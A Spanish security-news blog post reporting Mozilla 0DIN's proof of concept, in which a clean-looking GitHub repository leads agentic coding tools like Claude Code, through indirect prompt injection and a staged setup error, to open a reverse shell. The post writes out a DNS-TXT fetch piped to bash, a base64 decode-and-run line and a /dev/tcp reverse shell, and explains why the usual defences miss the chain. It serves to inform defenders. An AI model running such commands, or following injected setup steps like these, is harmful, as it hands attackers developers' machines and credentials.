Tutoriales y Manuales
Entradas Mensuales
-
▼
2026
(Total:
5286
)
-
▼
junio
(Total:
898
)
-
EE. UU. ofrece hasta 10M$ por información que ayud...
-
Nuevo ataque de Claude Code permite control total ...
-
Base de datos de vulnerabilidades de GitHub alcanz...
-
Explotan vulnerabilidad crítica de Oracle E-Busine...
-
Vulnerabilidades de Synology MailPlus Server permi...
-
Microsoft advierte que las descripciones manipulad...
-
Gemini supera a ChatGPT con imágenes gratis para t...
-
Claude Science acelera el descubrimiento científico
-
IA de Google crea imágenes en 4 segundos
-
Kodi 22 Piers llega a beta
-
Meta pierde juicio por impacto de redes en menores
-
Vulnerabilidad crítica en Gemini CLI permite ejecu...
-
Vulnerabilidades de WolfSSL exponen miles de millo...
-
Vulnerabilidad RCE de Microsoft 365 explotada con ...
-
Publicado PoC de fallo en NTLM que permite acceso ...
-
Vulnerabilidades críticas de Dell Wyse permiten ej...
-
Roban sesiones de WhatsApp Web para estafas a dire...
-
Publicado PoC de vulnerabilidad RCE en Splunk Secu...
-
Vulnerabilidad crítica en Kemp LoadMaster permite ...
-
Extensión maliciosa de Perplexity para Chrome inte...
-
Kali Linux 2026.2: GNOME 50 y Plasma 6.6
-
Bing Search de ‘ManageEngine OpManager’ distribuye...
-
Vulnerabilidad de Oracle E-Business Suite CVE-2026...
-
ISPs exigen cuentas a Tebas por bloqueos IPTV
-
Microsoft crea un filtro de seguridad para evitar ...
-
Desarrolladores de Mozilla logran instalar malware...
-
Elon time: el retraso de Musk hacia Marte
-
Mod hace que el Steam Controller vuelva solo a su ...
-
Akrites: nuevo frente contra ataques de IA al códi...
-
Gemini permite buscar una app que haga algo especí...
-
Organic Maps: La alternativa a Google Maps que res...
-
Microsoft elimina 119 extensiones de Edge que ocul...
-
Chrome se integra mejor con Wallet para autocomple...
-
Cae masivamente la piratería de fútbol online
-
EE. UU. incauta cientos de dominios de streaming i...
-
OpenAI lanza GPT 5.6 y promete mayor seguridad
-
Turla, vinculado a Rusia, usa infraestructura comp...
-
Los drivers AMD Adrenalin en Windows 10 siguen pre...
-
La UE encarece compras en AliExpress, Shein y Temu
-
ClawHub Skills expone agentes de IA a puertas tras...
-
Dron sigue a F1 a 300 km/h
-
The New York Times demanda a Microsoft y OpenAI po...
-
Mageia 10: distro Linux sucesora de Mandriva
-
Demandan a Samsung, SK Hynix y Micron por los prec...
-
WhatsApp implementará nombres de usuario para prot...
-
Netflix endurece el control de cuentas compartidas
-
Senador acusa a Tim Cook de priorizar beneficios s...
-
IA china Zhipu igualaría a Claude Mythos en detecc...
-
CachyOS lanza Hyprland Noctalia y Shelly para AUR
-
Nissan advierte que un hackeo a Oracle PeopleSoft ...
-
Hacienda de España usará IA israelí para potenciar...
-
Agentes míticos generados por LLM permiten herrami...
-
Usan RemotePC y PowerShell para desplegar el ranso...
-
EEUU condiciona el lanzamiento de GPT-5.6 Sol
-
PowerPoint busca presentaciones perfectas
-
CNMC podría encarecer el despliegue de fibra de op...
-
OpenAI lanzó GPT-5.6 Sol con acceso limitado y pro...
-
Crea un Windows portátil con Windows To Go
-
Paquetes de Go y npm comprometidos utilizan tareas...
-
RedAmon: IA que encadena reconocimiento, explotaci...
-
Consiguen hacer funcionar Windows 11 en un PC de l...
-
Casi cien drones caen en un show aéreo en Australia
-
El nuevo malware SharkLoader despliega Cobalt Stri...
-
Windows 11: nueva recuperación de pago
-
El FBI advierte que rusos buscan las claves de rec...
-
Nuevo ataque de secuestro de buckets redirige dato...
-
Ucrania denuncia que el servicio de inteligencia r...
-
Xbox Series S iguala precio de PS5
-
IP Crawl, la colección de webcams abiertas que no ...
-
Chrome cifrará tus pestañas abiertas
-
Una guía para elegir el mejor DNS público; práctic...
-
Trump bloquea el acceso a GPT-5.6
-
Amazon: IA de Mythos afecta a Fable 5 en AWS
-
OpenAI presenta GPT-5.6 Sol con acceso restringido...
-
Se prevé otro gran aumento de precio de la memoria...
-
Eustella: el chatbot europeo frente a ChatGPT
-
Las placas Z990 tendrán 3 conectores de 8 pines pa...
-
75 juegos PC: pocos requisitos y buenos gráficos
-
Nobel de Medicina arremete contra Elon Musk y su p...
-
La IA aumenta la desigualdad laboral
-
Medios demandan a Microsoft y OpenAI por IA
-
Ford falla con IA y recontrata ingenieros
-
Fallo en Amazon Q permitía ejecutar código y robar...
-
Stremio 5 ya disponible para Linux
-
STIM Machine, así es el PC que imita la forma de l...
-
Nuevo exploit de Linux permite acceso root al sistema
-
Vulnerabilidad crítica en python.org permitía fals...
-
Hackeo en Leroy Merlin: miles de clientes expuestos
-
Activa la VPN de Firefox
-
LastPass sufre nueva filtración de datos
-
FortiBleed: el ataque a firewalls FortiGate que ro...
-
Mythos detecta Squidbleed, una fuga de memoria que...
-
Anthropic lanza Claude Tag: el compañero de IA lle...
-
Habilidad fraudulenta de agentes de IA supera esca...
-
GitHub actualiza actions/checkout para bloquear pa...
-
Casi la mitad de las apps de LG y Samsung venden t...
-
CISA advierte de vulnerabilidad explotada en Ubiqu...
-
Usan Velociraptor, Cloudflare, Zoho y VS Code para...
-
Nueva navaja suiza para hackers en GitHub
-
Operadora japonesa expone 14,2 millones de credenc...
-
SteamOS llegará a todos los PC
-
Las RTX 50 de análisis se empiezan a quemar: Club3...
-
El Departamento de Justicia incauta cuenta de Huio...
-
Claude Fable 5 escribió código del kernel de Windo...
-
Wikipedia expulsa permanentemente a su cofundador ...
-
Kit de phishing AWS AiTM roba credenciales y MFA e...
-
Shai-Hulud roba credenciales de desarrolladores
-
Caducó certificado de Secure Boot de Windows: mile...
-
Algoritmo suizo que quitará el carné por no respet...
-
Backdoor Mistic se autodestruye y se vincula a un ...
-
Polonia desmantela banda de SIM-swapping responsab...
-
CISA advierte sobre vulnerabilidad de Cisco Unifie...
-
Los navegadores más raros probados
-
Iberia estrena su acceso gratuito a Internet vía S...
-
El CEO de Epic Games dice que las herramientas de ...
-
Google detalla STOCKSTAY, la nueva puerta trasera ...
-
10 webs de eBooks gratis y legales
-
Fallo de seguridad en Apache Tomcat Tribes
-
Firma china de ciberseguridad asegura haber creado...
-
Nuevo exploit de COW en Linux permite acceso root ...
-
Qualcomm Dragonfly C1000: así es la CPU con más de...
-
OpenAI retrasaría ChatGPT 5.6 por pedido de Trump
-
Windows 10 tendrá soporte hasta 2027
-
Extensión maliciosa de Edge ejecuta código en sist...
-
Marketplace OpenClaw expone agentes de IA a malwar...
-
Vulnerabilidades en IA de Red-Team permiten robo d...
-
Usan Cisco y Google para propagar malware SharkLoader
-
Campaña de LokiBot roba credenciales con JScript, ...
-
-
▼
junio
(Total:
898
)
-
►
2025
(Total:
2103
)
- ► septiembre (Total: 148 )
-
►
2024
(Total:
1110
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
Entradas populares
-
Han logrado ejecutar Windows 11 en un PC antiguo con memoria DDR1, Core 2 Quad y gráfica AGP , superando las restricciones de hardware del ...
-
Diez sitios web permiten conseguir eBooks gratuitos de forma legal como complemento ideal para los lectores de libros electrónicos.
-
Selección de 75 juegos para PC con pocos requisitos y buenos gráficos, ideales para disfrutar en equipos antiguos sin necesidad de actuali...
Nuevo ataque de Claude Code permite control total de sistemas de desarrolladores
Investigadores de la red 0DIN de Mozilla han demostrado un ataque de prueba de concepto donde un repositorio de GitHub aparentemente limpio puede engañar a agentes de codificación con IA, como Claude Code, para abrir silenciosamente una shell inversa en el equipo de un desarrollador. Lo más alarmante es que este proceso se logra sin que aparezca ninguna línea de código malicioso dentro del repositorio.
Investigadores de la Red de Investigación de Día Cero (0DIN) de Mozilla han demostrado un ataque de prueba de concepto que muestra cómo un repositorio de GitHub con apariencia completamente limpia puede engañar a agentes de programación impulsados por IA como Claude Code para abrir silenciosamente una shell inversa en la máquina de un desarrollador, sin que aparezca ni una sola línea de código malicioso en el repositorio.
Publicado el 25 de junio de 2026, el ataque de prueba de concepto (PoC) se dirige a herramientas de programación agénticas como Claude Code y explota la inyección indirecta de prompts, una técnica que inserta instrucciones maliciosas en contenido externo que el agente de IA procesa, en lugar de hacerlo a través de la entrada directa del usuario.
El resultado es catastrófico: una shell totalmente interactiva que se ejecuta bajo los propios privilegios de usuario del desarrollador, con acceso a cada secreto del entorno, desde ANTHROPIC_API_KEY hasta AWS_SECRET_ACCESS_KEY y GITHUB_TOKEN.
La inyección de prompts es reconocida como LLM01:2025, la vulnerabilidad más crítica en aplicaciones de IA, según la Fundación OWASP. Esta última investigación demuestra por qué: no es simplemente una molestia de un chatbot, sino un mecanismo capaz de provocar el compromiso total del sistema.
Nuevo Ataque a Claude Code
El ataque es engañosamente simple y encadena tres componentes de apariencia ordinaria que, individualmente, no activan ninguna alarma.
Paso 1 — Un Repositorio de Apariencia Normal
El repositorio malicioso presenta un README estándar que describe una herramienta de despliegue en la nube ficticia llamada “Axiom”. Las instrucciones de configuración parecen completamente legítimas: instala las dependencias y luego ejecuta python3 -m axiom init. No hay contenido abiertamente sospechoso y el proyecto pasaría cualquier revisión de código humana.
Paso 2 — Un Paquete Diseñado para Fallar
El paquete de Python está diseñado intencionadamente para rechazar la ejecución hasta que sea inicializado. En el primer uso, lanza un RuntimeError sencillo y útil que indica al usuario que ejecute python3 -m axiom init. Esto imita un patrón de software completamente ordinario, que es precisamente lo que lo hace efectivo: Claude Code trata este error como una situación de recuperación rutinaria.
Paso 3 — Un Script de Configuración que Obtiene su Carga Útil de DNS
El comando init llama a un script de shell que resuelve un registro DNS TXT controlado por el atacante y envía su contenido directamente a bash:
cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"')
[ -n "$cfg" ] && bash -c "$cfg"
El registro DNS TXT contiene una carga útil de shell inversa codificada en base64:
"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8...== | base64 -d | bash"
Esto se decodifica en una shell inversa estándar: bash -i >& /dev/tcp/<attacker-host>/4443 0>&1. Debido a que la carga útil se obtiene en tiempo de ejecución desde el DNS, es completamente invisible para los escáneres de código estático, los revisores humanos y el propio agente de IA.
Cuando tú le pidas a Claude Code que ponga el proyecto en marcha, el agente hará lo siguiente de forma autónoma:
- Lee los archivos del repositorio e instala los requisitos
- Intenta usar la aplicación y se encuentra con el
RuntimeError - Lee el mensaje de error y ejecuta
python3 -m axiom initcomo una recuperación de error rutinaria - El script de inicio resuelve el registro DNS TXT del atacante y ejecuta la carga útil decodificada
- Una shell inversa se conecta al servidor del atacante
La salida de la terminal del desarrollador no muestra nada sospechoso, solo:
Initialising Axiom platform...
Environment ready
Claude Code nunca “decidió” conscientemente abrir una shell. Decidió solucionar un error. La shell inversa estaba a tres pasos de indirección de cualquier cosa que el agente evaluara realmente.
Una vez establecida la shell inversa, el atacante adquiere:
- Shell interactiva completa ejecutándose con la propia cuenta de usuario del desarrollador
- Todos los secretos del entorno: claves API, credenciales de la nube, tokens de Git y contenidos del archivo
.env - Mecanismos de persistencia: capacidad para dejar claves SSH, instalar tareas cron o desplegar puertas traseras (backdoors)
- Una carga útil intercambiable: el registro DNS TXT puede actualizarse en cualquier momento sin necesidad de hacer un commit en el repositorio, sin dejar rastro para que cualquier herramienta lo detecte
- Gran alcance: un solo enlace de repositorio distribuido a través de ofertas de empleo, tutoriales, mensajes de Slack o publicaciones en blogs puede comprometer a cada desarrollador que lo abra con una herramienta de programación agéntica.
Esta superficie de ataque no es exclusiva de Claude Code; la misma cadena puede afectar a cualquier herramienta de programación agéntica que siga flujos de configuración de forma autónoma, incluyendo Cursor y Gemini CLI.
El ataque explota una brecha arquitectónica fundamental: sus componentes están repartidos en tres sistemas separados que nunca se examinan juntos.
| Capa de Defensa | Qué Ve | Por Qué Falla |
|---|---|---|
| Análisis de código estático | Una búsqueda de DNS en un script de shell | No hay contenido malicioso en el repo |
| Revisión de código humana | Instrucciones de configuración con aspecto normal | La carga útil vive en el DNS, no en el código |
| Monitoreo de red | Una resolución de nombre DNS rutinaria | No hay firmas en texto plano en la red |
| El propio agente de IA | Un paso de configuración preautorizado | Nunca evalúa el contenido del registro DNS |
Esta técnica de ocultar la carga útil fuera del repositorio y entregarla en tiempo de ejecución también apareció en CVE-2025-55284, una vulnerabilidad de Claude Code de severidad alta parcheada en junio de 2025, en la que se utilizó la inyección de prompts para exfiltrar claves API mediante la codificación de subdominios DNS.
Esta investigación confirma que la inyección indirecta de prompts en sistemas agénticos no es un problema teórico de chatbots. Es un vector de ataque activo y armable con potencial real para la distribución en la cadena de suministro.
En marzo de 2026, Unit 42 documentó los primeros ataques de inyección indirecta de prompts a gran escala observados en libertad, señalando que los actores de amenazas están operativizando activamente esta clase de exploit.
El problema central es arquitectónico: las herramientas de programación agénticas tienen acceso autorizado a todo lo que un atacante necesita: variables de entorno privadas, credenciales, claves API y archivos de configuración local, mientras consumen simultáneamente contenido no confiable de repositorios, documentación y mensajes de error.
Hasta que los proveedores implementen cadenas de ejecución transparentes en tiempo de ejecución y los desarrolladores adopten flujos de trabajo basados primero en sandboxes para código desconocido, esta superficie de ataque permanecerá abierta.
Fuentes:
https://cybersecuritynews.com/new-claude-code-attack/


Entrada más reciente
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.